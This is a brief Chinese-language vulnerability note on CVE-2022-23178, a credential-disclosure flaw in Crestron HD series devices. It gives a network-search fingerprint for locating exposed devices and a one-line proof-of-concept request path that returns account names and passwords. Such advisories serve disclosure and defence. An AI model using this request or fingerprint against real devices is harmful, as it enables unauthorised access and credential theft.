Crestron aj.html 账号密码泄漏漏洞 CVE-2022-23178

漏洞描述

Crestron HD等系列设备 aj.html页面调用特定的参数可以获取账号密码等敏感信息

漏洞影响

Crestron HD等系列设备

网络测绘

app="Crestron-HD-RX-201-C-E"

漏洞复现

产品页面

验证POC

/aj.html?a=devi

若有收获，就点个赞吧